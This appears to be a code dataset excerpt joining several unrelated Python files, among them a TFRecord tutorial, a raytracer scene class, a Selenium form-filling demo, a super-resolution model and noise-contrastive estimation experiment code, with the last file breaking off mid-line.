字节格式\ndef _bytes_feature(value):\n \"\"\"Returns a bytes_list from a string/byte.\"\"\"\n if isinstance(value, type(tf.constant(0))):\n # BytesList won't unpack a string from an EagerTensor.\n value = value.numpy()\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\n# 浮点数\ndef _float_feature(value):\n \"\"\"Return a float_list form a float/double.\"\"\"\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\n# 整数\ndef _int64_feature(value):\n \"\"\"Return a int64_list from a bool/enum/int/uint.\"\"\"\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\n# 创建一个TFRecord数据集样本\ndef serialize_example(feature0, feature1, feature2, feature3):\n \"\"\"\n 创建tf.Example\n \"\"\"\n\n # 转换成相应类型\n feature = {\n # 官方例子上好像有坑,这里不接受numpy.bool_的格式,要强制转成bool下\n 'feature0': _int64_feature(bool(feature0)),\n 'feature1': _int64_feature(feature1),\n 'feature2': _bytes_feature(feature2),\n 'feature3': _float_feature(feature3),\n }\n # 使用tf.train.Example来创建\n example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n # SerializeToString方法转换为二进制字符串\n return example_proto.SerializeToString()\n\n\n# 数据量\nn_observations = int(1e4)\n# bool型特征\nfeature0 = np.random.choice([False, True], n_observations)\n# 整数特征\nfeature1 = np.random.randint(0, 5, n_observations)\n# 字符串特征,字符串用字节的形式表示\nstrings = np.array([b'cat', b'dog', b'chicken', b'horse', b'goat'])\nfeature2 = strings[feature1]\n# 浮点数特征\nfeature3 = np.random.randn(n_observations)\n\n# TFRecord数据集名称\nfilename = 'tfrecord_test'\n# 
生成一个TFRecord数据集\nwith tf.io.TFRecordWriter(filename) as writer:\n for i in range(n_observations):\n example = serialize_example(feature0[i], feature1[i], feature2[i], feature3[i])\n writer.write(example)\n\n# 读取TFRecord数据集\nfilenames = [filename]\nraw_dataset = tf.data.TFRecordDataset(filenames)\nprint(raw_dataset)\n\n# 实际去制作一个图像的TFRecord数据集\n# 标签\nimage_labels = {\n 'dog': 0,\n 'kangaroo': 1,\n}\n# 读数据,binary格式\nimage_string = open('./data/tfrecord_source/dog.jpg', 'rb').read()\nlabel = image_labels['dog']\n\n\n# 创建图像数据的Example\ndef image_example(image_string, label):\n image_shape = tf.image.decode_jpeg(image_string).shape\n\n feature = {\n 'height': _int64_feature(image_shape[0]),\n 'width': _int64_feature(image_shape[1]),\n 'depth': _int64_feature(image_shape[2]),\n 'label': _int64_feature(label),\n 'image_raw': _bytes_feature(image_string),\n }\n\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\n\n# 打印部分信息出来看看Example里是些啥\nimage_example_proto = image_example(image_string, label)\nfor line in str(image_example_proto).split('\\n')[:15]:\n print(line)\n\n# 制作 `images.tfrecords`数据集\nimage_path = './data/tfrecord_source/'\nimages = glob.glob(image_path + '*.jpg')\nrecord_file = 'images.tfrecord'\ncounter = 0\n\nwith tf.io.TFRecordWriter(record_file) as writer:\n for fname in images:\n with open(fname, 'rb') as f:\n image_string = f.read()\n label = image_labels[os.path.basename(fname).replace('.jpg', '')]\n\n # 生成一个`tf.Example`\n tf_example = image_example(image_string, label)\n\n # 将`tf.example` 写入 TFRecord\n writer.write(tf_example.SerializeToString())\n\n counter += 1\n print('Processed {:d} of {:d} images.'.format(\n counter, len(images)))\n\nprint(' Wrote {} images to {}'.format(counter, record_file))\n\n# 加载一个制作好的TFRecord\nraw_train_dataset = tf.data.TFRecordDataset('images.tfrecord')\n\n# 因为之前制作的时候Example都是进过序列化了的,那么使用之前还要解析一下\n# tf.io.parse_single_example(example_proto, feature_description)函数可以解析单条example\n\n# 解析的格式需要跟之前创建example时一致\nimage_feature_description = {\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'depth': tf.io.FixedLenFeature([], tf.int64),\n 'label': tf.io.FixedLenFeature([], tf.int64),\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n}\n\n\n# 解析函数\ndef parse_tf_example(example_proto):\n # 解析Example\n parsed_example = tf.io.parse_single_example(example_proto, image_feature_description)\n\n # 预处理\n x_train = tf.image.decode_jpeg(parsed_example['image_raw'], channels=3)\n x_train = tf.image.resize(x_train, (416, 416))\n x_train /= 255.\n\n label_y = parsed_example['label']\n y_train = label_y\n\n return x_train, y_train\n\n\n# 解析后的数据集\ntrain_dataset = raw_train_dataset.map(parse_tf_example)\n\n# 制作成训练集\ntrain_ds = train_dataset.shuffle(buffer_size=10000).batch(2).repeat(10)\n# 打印出来看看\nfor batch, (x, y) in enumerate(train_ds):\n print(batch, x.shape, y)\n","repo_name":"lj502766817/DP_Learn","sub_path":"TF/other/TFRecord_demo.py","file_name":"TFRecord_demo.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"35576205911","text":"\"\"\"The scene is the collection of objects, camera and lights to be rendered\"\"\"\nimport math\nfrom typing import List, Tuple\n\nimport colors\nimport intersections\nimport lights\nimport points\nimport rays\nimport shapes\n\nclass Scene:\n \"\"\"The scene is the collection of objects, light and camera that constitutes\n an image\n \"\"\"\n\n def __init__(self, 
objects: List[shapes.Shape]=None,\n lights: List[lights.Light]=None,\n recursion_limit: int=5) -> None:\n\n if objects is None:\n self.objects = []\n else:\n self.objects = objects\n\n if lights is None:\n self.lights = []\n else:\n self.lights = lights\n\n self.recursion_limit = recursion_limit\n\n\n def add_object(self, shape: shapes.Shape):\n \"\"\"Add an object to the scene\"\"\"\n self.objects.append(shape)\n\n\n def intersect(self, r: rays.Ray) -> intersections.Intersections:\n \"\"\"Intersect the ray r with all the objects in the scene and return\n intersections sotred by t value\n \"\"\"\n\n for i, shape in enumerate(self.objects):\n if i == 0:\n all_intersections = shape.intersect(r)\n else:\n all_intersections += shape.intersect(r)\n\n return all_intersections\n\n\n def shade_hit(self,\n computations: intersections.Computations,\n remaining=5) -> Tuple[colors.Color, int]:\n \"\"\"Given some pre-calculated values about a hit, calculate its color\"\"\"\n\n surface = colors.Color(0, 0, 0)\n\n for light in self.lights:\n\n in_shadow = self.is_shadowed(computations.over_point, light)\n\n surface += computations.object.material.lighting(light,\n computations.over_point, computations.eyev,\n computations.normalv, in_shadow = in_shadow)\n\n reflected, _ = self.reflected_color(computations,\n remaining=remaining)\n refracted, _ = self.refracted_color(computations,\n remaining=remaining)\n\n material = computations.object.material\n if material.reflective > 0 and material.transparency > 0:\n reflectance = computations.schlick\n return (surface +\n reflected * reflectance +\n refracted * (1 - reflectance), remaining)\n\n return surface + reflected + refracted, remaining\n\n def color_at(self, ray: rays.Ray, remaining=25) -> Tuple[colors.Color, int]:\n \"\"\"Calculates the color of a ray in the scene\"\"\"\n\n # List out all the surfaces the ray intersects\n ray_intersections = self.intersect(ray)\n\n # Find the closest one, in front of the camera (the \"hit\"):\n hit = ray_intersections.hit()\n\n # If there were no hits, return the background color\n if hit is None:\n return colors.Color(0, 0, 0), remaining\n\n # Else, calculate the color of the pixel\n precomputes = hit.precompute(ray, all_intersections=ray_intersections)\n return self.shade_hit(precomputes, remaining=remaining)\n\n def is_shadowed(self, point: points.Point, light: lights.Light) -> bool:\n \"\"\"Returns True if the point is shadowed from the light\"\"\"\n\n v = light.position - point\n distance = v.magnitude()\n direction = v.normalize()\n\n ray = rays.Ray(point, direction)\n intersections = self.intersect(ray)\n\n hit = intersections.hit()\n\n if hit is not None and hit.t < distance:\n return True\n\n return False\n\n def reflected_color(self,\n precomputes: intersections.Computations,\n remaining: int=5) -> Tuple[colors.Color, int]:\n \"\"\"Calculate the reflected color of a hit on a surface.\n\n remaining tracks how many levels of recursion we have done, and when\n it is zero, simply returns black\n \"\"\"\n if remaining == 0:\n # If we have gone too far down the recursion stack, just return\n # black\n return colors.Color(0, 0, 0), 0\n\n if precomputes.object.material.reflective == 0:\n # If the material is not reflective, return black\n return colors.Color(0, 0, 0), 0\n\n # Fire a new ray from the intersection point at the reflection angle\n reflect_ray = rays.Ray(precomputes.over_point, precomputes.reflectv)\n\n remaining -= 1\n\n color, remaining = self.color_at(reflect_ray, remaining=remaining)\n return color * 
precomputes.object.material.reflective, remaining\n\n\n def refracted_color(self,\n precomputes: intersections.Computations,\n remaining: int=5) -> Tuple[colors.Color, int]:\n \"\"\"Calculate the refracted color of a hit on a surface.\n\n remaining tracks how many levels of recursion we have done, and when\n it is zero, simply returns black\n \"\"\"\n\n if remaining == 0:\n # If we have gone too far down the recursion stack, just return\n # black\n return colors.Color(0, 0, 0), remaining\n\n if precomputes.object.material.transparency == 0:\n # If the material is not transparent, return black\n return colors.Color(0, 0, 0), remaining\n\n # Check for total internal refraction\n n_ratio = precomputes.n1 / precomputes.n2\n cos_i = precomputes.eyev.dot(precomputes.normalv)\n sin2_t = n_ratio ** 2 * (1 - cos_i ** 2)\n if sin2_t > 1:\n return colors.Color(0, 0, 0), remaining\n\n cos_t = math.sqrt(1.0 - sin2_t)\n\n direction = (precomputes.normalv * (n_ratio * cos_i - cos_t) -\n precomputes.eyev * n_ratio)\n\n refract_ray = rays.Ray(precomputes.under_point, direction)\n\n color = (self.color_at(refract_ray, remaining-1)[0] *\n precomputes.object.material.transparency)\n\n return color, remaining\n","repo_name":"craigmbooth/raytracer","sub_path":"raytracer/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"9632310002","text":"# Importação da biblioteca Selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\nimport os\n\n\n\ndados = {\n 'email': 'rdr@gmail.com',\n 'cpf': 12365498798,\n 'senha': 'rdr123'\n}\nos.system(\"cls\")\nprint(\"Iniciando nosso robô...\")\n\n# Instanciando o Selenium\nurl = webdriver.Chrome()\n\n# abre página\nurl.get('https://rdralves.github.io/home/')\n\n# preencher email\nurl.find_element(By.XPATH, '//*[@id=\"exampleInputEmail1\"]').send_keys(dados['email'])\ntime.sleep(0.5)\n\n# preenche cpf\nurl.find_element(By.XPATH, '//*[@id=\"exampleInputCPF\"]').send_keys(dados['cpf'])\ntime.sleep(0.5)\n\n# peenche senha\nurl.find_element(\n By.XPATH, '//*[@id=\"exampleInputPassword1\"]').send_keys(dados['senha'])\ntime.sleep(0.5)\n\n# clica no botão Enviar\nurl.find_element(By.XPATH, '/html/body/div/form/button').click()\ntime.sleep(0.5)\n\n# finalizado o robo\nprint('Missão cumprinda...')","repo_name":"rdralves/Web_Scraping","sub_path":"projeto2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"34269040662","text":"from __future__ import absolute_import\nfrom datetime import datetime\nimport logging\n\nfrom bson import ObjectId\nfrom pylru import lrucache\n\nfrom context import __version__\nfrom context.data.base import Base\nfrom context.settings import DATA_CACHE_SIZE_CONTEXT\n\n\nclass Context(Base):\n LOGGER = logging.getLogger(__name__)\n collection_name = \"context\"\n cache = lrucache(DATA_CACHE_SIZE_CONTEXT)\n\n def get(self, _id, _rev):\n if _id in self.cache and self.cache[_id][\"_rev\"] == _rev:\n return self.cache[_id]\n else:\n data = next(self.collection.find({\"_id\": _id}), None)\n self.cache[_id] = data\n return data\n\n def insert(self, entities, locale, new_context_id, application_id,\n session_id, 
user_id, now=None):\n \"\"\"\n\n :type user_id: ObjectId\n :type session_id: ObjectId\n :type application_id: ObjectId\n :type new_context_id: ObjectId\n :type locale: str\n :type entities: list\n \"\"\"\n if now is None:\n now = datetime.now()\n\n record = {\n \"_id\": new_context_id,\n \"entities\": entities,\n \"session_id\": session_id,\n \"locale\": locale,\n \"created\": now.isoformat(),\n \"application_id\": application_id,\n \"version\": __version__,\n \"_rev\": new_context_id\n }\n if user_id is not None:\n record[\"user_id\"] = user_id\n\n self.collection.insert(record)\n self.cache[new_context_id] = record\n\n return {\n \"_id\": new_context_id,\n \"_rev\": new_context_id\n }\n\n def update(self, context_id, _rev, entities=None, unsupported_entities=None, now=None):\n\n \"\"\"\n\n :rtype : ObjectId\n :type now: datetime\n :type entities: list\n :type _rev: ObjectId\n :type context_id: ObjectId\n \"\"\"\n now = datetime.now() if now is None else now\n set_data = {\n \"_rev\": _rev,\n \"updated\": now.isoformat()\n }\n if entities is not None:\n set_data[\"entities\"] = entities\n\n set_data[\"unsupported_entities\"] = unsupported_entities if unsupported_entities is not None else {}\n\n self.collection.update(\n {\n \"_id\": context_id\n },\n {\n \"$set\": set_data\n }\n )\n\n if context_id in self.cache:\n self.cache[context_id][\"entities\"] = entities\n self.cache[context_id][\"_rev\"] = _rev\n self.cache[context_id][\"updated\"] = now.isoformat()\n\n return _rev\n","repo_name":"robdefeo/context","sub_path":"context/data/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"20630380299","text":"\"\"\"\nThis module provides functions to compute various interesting metrics of the Safe Curve G(alpha)\n\"\"\"\n\nimport torch\nimport numpy as np\n\n\ndef compute_metric(\n score_id_val,\n score_id_test,\n score_ood_test,\n logits_id_val,\n labels_id_val,\n logits_id_test,\n labels_id_test,\n logits_ood_test=None,\n labels_ood_test=None,\n metrics=[\"quantile_95\"],\n):\n \"\"\"\n Returns a dictionary of different queried metrics\n Arguments:\n - scores_id_val: numpy array of scores on in distribution data (validation set)\n - scores_id_test: numpy array of scores on in distribution data (test set)\n - scores_ood_test: numpy array of scores on ood data\n - data_id_val: input data from training distribution (i.e. features of classifier)\n - logits_id_val: logits of classifier on id validation set\n - labels_id_val: ground truth labels on id validation set\n - data_id_test: input data from id test distribution (i.e. features of classifier)\n - logits_id_test: logits of classifier on id test set\n - labels_id_test: ground truth labels on id id set\n - data_ood_test: input data from test distribution (i.e. 
features of classifier)\n - logits_ood_test: logits of classifier on data_test\n - labels_ood_test: ground truth labels for data_test\n - metrics: list of metrics that evaluate safe region\n - num_alphas: amount of quantiles on which metrics are computed\n - ece_bins: number of bins to compute ece\n Return:\n - out: dictionary with (a) name of metric as key and (b) computed value of this metric\n \"\"\"\n\n if logits_ood_test is None or labels_ood_test is None:\n ood_prediction = False\n else:\n ood_prediction = True\n\n possible_metrics = [\n \"accuracy\", # accuracy on data sets\n \"quantile_95\", # 95 percentile\n ]\n assert all(metric in possible_metrics for metric in metrics)\n\n # Compute true-false values on id val data\n true_false_id_val = (\n (torch.from_numpy(logits_id_val).argmax(1) == torch.from_numpy(labels_id_val))\n .float()\n .cpu()\n .view(-1)\n .numpy()\n )\n\n # Compute true-false values on id test data\n true_false_id_test = (\n (torch.from_numpy(logits_id_test).argmax(1) == torch.from_numpy(labels_id_test))\n .float()\n .cpu()\n .view(-1)\n .numpy()\n )\n\n # Compute accuracy on validation, test and ood data\n accuracy_id_val = np.sum(true_false_id_val) / true_false_id_val.shape[0]\n accuracy_id_test = np.sum(true_false_id_test) / true_false_id_test.shape[0]\n\n if ood_prediction:\n # Compute true-false values on ood test data\n true_false_ood_test = (\n (\n torch.from_numpy(logits_ood_test).argmax(1)\n == torch.from_numpy(labels_ood_test)\n )\n .float()\n .cpu()\n .view(-1)\n .numpy()\n )\n accuracy_ood_test = np.sum(true_false_ood_test) / true_false_ood_test.shape[0]\n\n # Output dictionary\n out = {}\n\n if \"accuracy\" in metrics:\n out[\"acc_id_test\"] = accuracy_id_test\n out[\"acc_id_val\"] = accuracy_id_val\n if ood_prediction:\n out[\"acc_ood_test\"] = accuracy_ood_test\n\n # Compute 95 percentile where the 95 percentile is defined on the id val data\n if \"quantile_95\" in metrics:\n qs = np.quantile(score_id_val, 0.95)\n\n if ood_prediction:\n mask = torch.from_numpy(score_ood_test) < qs\n out[\"n_95_frac_ood\"] = mask.sum().item() / logits_ood_test.shape[0]\n out[\"n_95_ood\"] = (\n (\n torch.from_numpy(logits_ood_test[mask]).argmax(1)\n == torch.from_numpy(labels_ood_test[mask])\n ).sum()\n / mask.sum()\n ).item()\n\n mask = torch.from_numpy(score_id_test) < qs\n out[\"n_95_frac_id_test\"] = mask.sum().item() / logits_id_test.shape[0]\n out[\"n_95_id_test\"] = (\n (\n torch.from_numpy(logits_id_test[mask]).argmax(1)\n == torch.from_numpy(labels_id_test[mask])\n ).sum()\n / mask.sum()\n ).item()\n\n return out\n","repo_name":"XarwinM/competence_estimation","sub_path":"competence_estimation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"9503224793","text":"import terminalio as tio\nimport displayio as dpio\nimport adafruit_imageload as imgload\n\n# tio.Terminal does not accept subclass of TileGrid, so we cannot maek TileGrid as a base class.\n# Also, it seems not possible to subclass tio.Terminal.\n\nclass RictyTerminal (dpio.Group):\n Bitmap, Palette = imgload.load(\"font/RictyBold.bmp\")\n\n def __init__(self, width, height) :\n super().__init__()\n self.tg = dpio.TileGrid(self.Bitmap, pixel_shader = self.Palette,\n width = width, height = height,\n tile_width = 10, tile_height = 20)\n self.term = tio.Terminal(self.tg, tio.FONT)\n self.append(self.tg)\n self.width = width\n self.height = height\n\n def write(self, 
txt) :\n return self.term.write(txt)\n\nclass RictyHTerminal (dpio.Group):\n Bitmap, Palette = imgload.load(\"font/RictyBoldH.bmp\")\n Table = dict(zip(\" っまみむめもらりるれろ、ー。わ0123456789・!やゆよ?をがぎぐげござじずぜぞだぢづでどばびぶべぼぱぴぷぺぽ〜「ん」ゃゅょあいうえおかきくけこさしすせそたちつてとなにぬねのはひふへほ\",\n \"\"\" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\"\"\"))\n\n def __init__(self, width, height) :\n super().__init__()\n self.tg = dpio.TileGrid(self.Bitmap, pixel_shader = self.Palette,\n width = width, height = height,\n tile_width = 20, tile_height = 20)\n self.term = tio.Terminal(self.tg, tio.FONT)\n self.append(self.tg)\n \n def write(self, txt) :\n txt = \"\".join(self.Table.get(x, x) for x in txt)\n return self.term.write(txt)\n \n","repo_name":"t-ikegami/WioTerminal-CircuitPython","sub_path":"libsrc/RictyBoldTerminal.py","file_name":"RictyBoldTerminal.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32553073618","text":"from collections import OrderedDict\nimport torch\nimport torch.nn.functional as F\nfrom torch.optim import lr_scheduler\nimport models.networks as networks\nfrom .base_model import BaseModel\nimport math\nimport os\n\n\nclass HyperRIMModel(BaseModel):\n def __init__(self, opt):\n super(HyperRIMModel, self).__init__(opt)\n train_opt = opt['train']\n\n # define networks and load pretrained models\n self.netG = networks.define_G(opt).to(self.device)\n if self.is_train:\n self.netG.train()\n self.load()\n # store the number of levels and code channel\n self.num_levels = int(math.log(opt['scale'], 2))\n self.code_nc = opt['network_G']['code_nc']\n self.map_nc = opt['network_G']['map_nc']\n\n # define losses, optimizer and scheduler\n self.netF = networks.define_F(opt).to(self.device)\n self.projections = None\n if self.is_train:\n # G\n wd_G = train_opt['weight_decay_G'] if train_opt['weight_decay_G'] else 0\n map_network_params = []\n core_network_params = []\n # can freeze weights for any of the levels\n freeze_level = train_opt['freeze_level']\n for k, v in self.netG.named_parameters():\n if v.requires_grad:\n if freeze_level:\n if \"level_%d\" % freeze_level not in k:\n if 'map' in k:\n map_network_params.append(v)\n else:\n core_network_params.append(v)\n else:\n if 'map' in k:\n map_network_params.append(v)\n else:\n core_network_params.append(v)\n else:\n print('WARNING: params [{:s}] will not optimize.'.format(k))\n self.optimizer_G = torch.optim.Adam([{'params': core_network_params},\n {'params': map_network_params, 'lr': 1e-2 * train_opt['lr_G']}],\n lr=train_opt['lr_G'], weight_decay=wd_G,\n betas=(train_opt['beta1_G'], 0.999))\n self.optimizers.append(self.optimizer_G)\n # for resume training - load the previous optimizer stats\n self.load_optimizer()\n\n # schedulers\n if train_opt['lr_scheme'] == 'MultiStepLR':\n for optimizer in self.optimizers:\n self.schedulers.append(lr_scheduler.MultiStepLR(optimizer, train_opt['lr_steps'],\n train_opt['lr_gamma']))\n else:\n raise NotImplementedError('MultiStepLR learning rate scheme is enough.')\n\n self.log_dict = OrderedDict()\n\n print('---------- Model initialized ------------------')\n self.print_network()\n print('-----------------------------------------------')\n\n def feed_data(self, data, code=[], need_HR=True):\n self.lr = data['LR'].to(self.device)\n self.code = code\n if need_HR: # train or val\n self.targets = dict()\n # only feed the images, not their paths\n for key, val in data.items():\n if 
('HR' in key or 'D' in key) and 'path' not in key:\n self.targets[key] = val.to(self.device)\n\n # Generate random code input at specified level (if left empty, then generate code for all levels)\n def gen_code(self, bs, w, h, levels=[], tensor_type=torch.randn):\n gen_levels = levels if levels != [] else range(self.num_levels)\n out_code = []\n for i in gen_levels:\n out_code.append(tensor_type(bs, self.map_nc + self.code_nc * w * (2 ** i) * h * (2 ** i)).to(self.device))\n return out_code\n\n # Random projection matrix for reducing LPIPS feature dimension\n def init_projection(self, h, total_dim=1000):\n # default to h == w\n fake_input = torch.zeros(1, 3, h, h)\n fake_feat, fake_shape = self.netF(fake_input)\n self.projections = []\n dim_per_layer = int(total_dim * 1. / len(fake_feat))\n for feat in fake_feat:\n self.projections.append(F.normalize(torch.randn(feat.shape[1], dim_per_layer), p=2, dim=1).to(self.device))\n\n def clear_projection(self):\n self.projections = None\n\n def _get_target_at_level(self, level):\n for key, val in self.targets.items():\n if str(level + 1) in key and 'path' not in key:\n return val\n return self.targets['HR']\n\n def compute_feature_loss(self, gen_feat, real_feat, gen_shape):\n # compute l2 feature loss given features\n result = 0\n for i, g_feat in enumerate(gen_feat):\n cur_diff = torch.sum((g_feat - real_feat[i]) ** 2, dim=1) / (gen_shape[i] ** 2)\n result += cur_diff\n return result\n\n def get_features(self, level=-1):\n '''\n Assuming the generated features are for the same LR input, therefore just one pass for the target feature\n '''\n self.netG.eval()\n out_dict = OrderedDict()\n with torch.no_grad():\n gen_imgs = self.netG(self.lr, self.code)\n gen_feat, gen_shape = self.netF(gen_imgs[level])\n real_feat, real_shape = self.netF(self._get_target_at_level(level))\n gen_features = []\n real_features = []\n # random projection\n for i, g_feat in enumerate(gen_feat):\n proj_gen_feat = torch.mm(g_feat, self.projections[i])\n proj_real_feat = torch.mm(real_feat[i], self.projections[i])\n gen_features.append(proj_gen_feat / gen_shape[i])\n real_features.append(proj_real_feat / gen_shape[i])\n gen_features = torch.cat(gen_features, dim=1)\n real_features = torch.cat(real_features, dim=1)\n\n out_dict['gen_feat'] = gen_features\n out_dict['real_feat'] = real_features\n\n self.netG.train()\n return out_dict\n\n def get_loss(self, level=-1):\n self.netG.eval()\n with torch.no_grad():\n gen_imgs = self.netG(self.lr, self.code)\n gen_feat, gen_shape = self.netF(gen_imgs[level])\n real_feat, real_shape = self.netF(self._get_target_at_level(level))\n result = self.compute_feature_loss(gen_feat, real_feat, gen_shape)\n self.netG.train()\n return result\n\n def optimize_parameters(self, step, inter_supervision=False):\n torch.autograd.set_detect_anomaly(True)\n self.optimizer_G.zero_grad()\n # intermediate supervision adds loss from intermediate resolutions\n if inter_supervision:\n outputs = self.netG(self.lr, self.code)\n l_g_total = 0.\n for i, output in enumerate(outputs):\n gen_feat, gen_shape = self.netF(output)\n real_feat, real_shape = self.netF(self._get_target_at_level(i))\n l_g_total += self.compute_feature_loss(gen_feat, real_feat, gen_shape)\n else:\n outputs = self.netG(self.lr, self.code)\n l_g_total = 0.\n gen_feat, gen_shape = self.netF(outputs[-1])\n real_feat, real_shape = self.netF(self._get_target_at_level(-1))\n l_g_total += self.compute_feature_loss(gen_feat, real_feat, gen_shape)\n l_g_total = torch.sum(l_g_total)\n 
l_g_total.backward()\n self.optimizer_G.step()\n self.log_dict['l_g_lpips'] = l_g_total.item()\n\n def test(self):\n self.netG.eval()\n with torch.no_grad():\n output = self.netG(self.lr, self.code)\n self.pred = output[-1]\n self.netG.train()\n\n def get_current_log(self):\n return self.log_dict\n\n def get_current_visuals(self, need_HR=True):\n out_dict = OrderedDict()\n out_dict['LR'] = self.lr.detach()[0].float().cpu()\n out_dict['HR_pred'] = self.pred.detach()[0].float().cpu()\n if need_HR:\n out_dict['HR'] = self.targets['HR'].detach()[0].float().cpu()\n return out_dict\n\n def print_network(self):\n # Generator\n s, n = self.get_network_description(self.netG)\n print('Number of parameters in G: {:,d}'.format(n))\n if self.is_train:\n message = '-------------- Generator --------------\\n' + s + '\\n'\n network_path = os.path.join(self.save_dir, '../', 'network.txt')\n with open(network_path, 'w') as f:\n f.write(message)\n\n def load(self):\n load_path_G = self.opt['path']['pretrain_model_G']\n if load_path_G is not None:\n print('loading model for G [{:s}] ...'.format(load_path_G))\n self.load_network(load_path_G, self.netG)\n\n def load_optimizer(self):\n load_path_O = self.opt['path']['pretrain_model_O']\n if load_path_O is not None:\n print('loading optimizer [{:s}] ...'.format(load_path_O))\n self.optimizer_G.load_state_dict(torch.load(load_path_O))\n\n def save(self, iter_label):\n self.save_network(self.save_dir, self.netG, 'G', iter_label)\n self.save_network(self.save_dir, self.optimizer_G, 'O', iter_label)\n","repo_name":"niopeng/HyperRIM","sub_path":"code/models/HyperRIM_model.py","file_name":"HyperRIM_model.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"41"} +{"seq_id":"28241864322","text":"import time\nfrom functools import partial\n\nimport numpy as np\n# import matplotlib.pyplot as plt\nimport torch\nfrom torch.utils.data import DataLoader\nfrom joblib import Memory\n\n\nfrom .defaults import DEFAULTS, CACHE_FOLDER\nfrom .train import run_epoch as run_epoch_extended\nfrom .train import Metrics, eval_downstream, callback_extended\nfrom .autoptim import minimize\nfrom .distribution.multivariate import MultivariateNormal, Histogram\nfrom .utils import (\n get_classif_upperbound,\n extract_weights,\n delete_weights,\n freeze,\n load_weights,\n get_name_from_dict,\n set_torch_seed\n)\n# from nlica.vis import (\n# visualize_timeseries,\n# visualize_distribution,\n# plot_kpis\n# )\n\n\ntorch.set_default_dtype(torch.float64)\n\n\nN_SAMPLES_TEST = 4000\nmem = Memory(CACHE_FOLDER)\n\n\ndef perturb_init_inplace(xlist, seed=None):\n '''xlist is a list of parameters'''\n # Control a factor of variation\n if seed is not None:\n set_torch_seed(seed)\n for x in xlist:\n # Define initialization noise\n init_noise_scale = 0.2\n init_noise = init_noise_scale * torch.randn_like(x.data)\n\n # Clamp unacceptable values (a bit barbaric)\n sel_too_big = init_noise > 0.5\n sel_too_small = init_noise < -0.5\n init_noise[sel_too_big] = 0.5\n init_noise[sel_too_small] = -0.5\n\n # Update the initial parameter\n x.data += init_noise # add gaussian noise\n\n\ndef run_model(**kwargs):\n torch.autograd.set_detect_anomaly(True)\n\n # WARNING: hardcoded\n # nb samples used to generate observation is different from\n # nb samples used in the predict_mse formula\n prop_noise = kwargs['noise_to_data'] / (1 + kwargs['noise_to_data'])\n n_samples_data_test = int((1 - prop_noise) * N_SAMPLES_TEST)\n\n if 
kwargs['predict_mse'] or kwargs['cost'] == \"asympmse\":\n n_samples_data = kwargs['n_samples_data_montecarlo']\n else:\n n_samples_data = int((1 - prop_noise) * kwargs['n_samples'])\n\n # Device\n device = \"cpu\"\n if kwargs['verbose']:\n print(\"device: \", device)\n\n # create_directory(kwargs['out'], overwrite=True)\n kwargs['out'].mkdir(exist_ok=True, parents=True)\n\n metrics = Metrics(path=kwargs['out'], verbose=kwargs['verbose'])\n\n # Add parameters of the experiment to metrics\n metrics.train.experiment.update(kwargs)\n\n # Estimatation procedure\n if kwargs['verbose']:\n print('Using :', kwargs[\"estimation\"])\n\n if kwargs[\"estimation\"] == \"singlence\":\n from nlica.estimation.single.singlence import Model, supervised, make_dataset\n elif kwargs[\"estimation\"] == \"singlemle\":\n from nlica.estimation.single.singlemle import Model, supervised, make_dataset\n run_epoch = partial(run_epoch_extended, supervised=supervised)\n\n # Generative model :\n if kwargs['verbose']:\n print('Using :', kwargs['generation'])\n if kwargs['generation'] == 'gaussian_mean':\n from nlica.generation.singleparam.gaussian_mean import get_model\n if kwargs['generation'] == 'gaussian_var':\n from nlica.generation.singleparam.gaussian_var import get_model\n elif kwargs['generation'] == 'gaussian_corr':\n from nlica.generation.singleparam.gaussian_corr import get_model\n\n data_marginal, source = get_model(\n n_comp=kwargs['n_comp'], n_samples=n_samples_data,\n seed=kwargs['seed_data_gen'], data_val=kwargs['data_val']\n )\n\n _, source_test = get_model(\n n_comp=kwargs['n_comp'], n_samples=n_samples_data_test,\n seed=kwargs['seed_data_testset'], data_val=kwargs['data_val']\n )\n\n data_marginal_truth, _ = get_model(\n n_comp=kwargs['n_comp'], n_samples=1,\n seed=kwargs['seed_data_gen'], data_val=kwargs['data_val']\n )\n\n obs = data_marginal.generator_true(source)\n obs_test = data_marginal.generator_true(source_test)\n\n # # Generative model : visualize sources and observations\n # if kwargs['with_plot']:\n # visualize_timeseries(source, figpath=kwargs['out'] / \"source_timeseries.pdf\")\n # visualize_distribution(source, figpath=kwargs['out'] / \"source_distribution.pdf\")\n # plt.close(\"all\")\n # visualize_timeseries(obs, figpath=kwargs['out'] / \"observation_timeseries.pdf\")\n # visualize_distribution(obs, figpath=kwargs['out'] / \"observation_distribution.pdf\")\n # plt.close(\"all\")\n\n # Choose contrastive noise\n\n # noise marginal\n if kwargs['noise_type'] == 